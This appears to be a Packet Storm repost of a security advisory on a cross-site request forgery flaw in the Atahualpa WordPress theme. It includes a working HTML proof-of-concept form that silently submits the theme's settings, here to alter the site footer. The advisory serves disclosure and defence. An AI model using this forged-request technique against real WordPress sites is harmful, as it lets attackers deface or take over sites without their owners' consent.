what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Atahualpa Theme Cross Site Request Forgery

WordPress Atahualpa Theme Cross Site Request Forgery
Posted Mar 3, 2017
Authored by Spyros Gasteratos

WordPress Atahualpa theme suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 5ea7e65afbdc303b2f40ac150522c06621dc867d9f1b834744881a420a365867

WordPress Atahualpa Theme Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross Site Request Forgery vulnerability exists in the Atahualpa
Wordpress theme which allows attackers to legitimate users into
performing unintended actions on the Atahualpa theme configuration page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Atahualpa WordPress Theme
WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html

The theme's save configuration settings form doesn't include a Wordpress CSRF nonce and consequently the script servicing the request doesn't check for one. This allows the form to be submitted with preloaded values as long as the browser sends a valid login cookie.

This allows attackers who lure legitimate users with an active Wordpress session to an irrelevant website which submits the "Save Settings" request to the user's Wordpress install. Since the request is towards a domain for which the browser has cookies the legitimate cookies will be submitted and the request will succeed.

The theme's configuration panel allows setting a variety of configuration options including changes in the website's appearance as well as appending Javascript in several areas. Attackers can use this vulnerability to take over a Wordpress website.
Proof of concept

Install the theme, login as admin and load the following csrf poc in the same browser on another tab, when clicking "Submit" it will modify the page footer.

<html>
<body>
<form action="http://<target>/wp-admin/themes.php?page=atahualpa-options" method="POST">
<input type="hidden" name="footer_style" value="background-color: #ffffff;
border-top: dashed 1px #cccccc;
padding: 10000px;
text-align: center;
color: #777777;
font-size: 95%;
/*bye*/"/>
<input type="hidden" name="footer_style_links" value="text-decoration: none;
color: #777777;
font-weight: normal;"/>
<input type="hidden" name="footer_style_links_hover" value="text-decoration: none;
color: #777777;
font-weight: normal;"/>
<input type="hidden" name="footer_style_content" value="Copyright &copy; %current-year% %home% - All Rights Reserved"/>
<input type="hidden" name="full_width_footer" value="No"/>
<input type="hidden" name="sticky_layout_footer" value="No"/>
<input type="hidden" name="footer_show_queries" value="No"/>
<input type="hidden" name="save" value=""/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="category" value="footer-style"/>
<input type="submit" value="Submit"/>
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close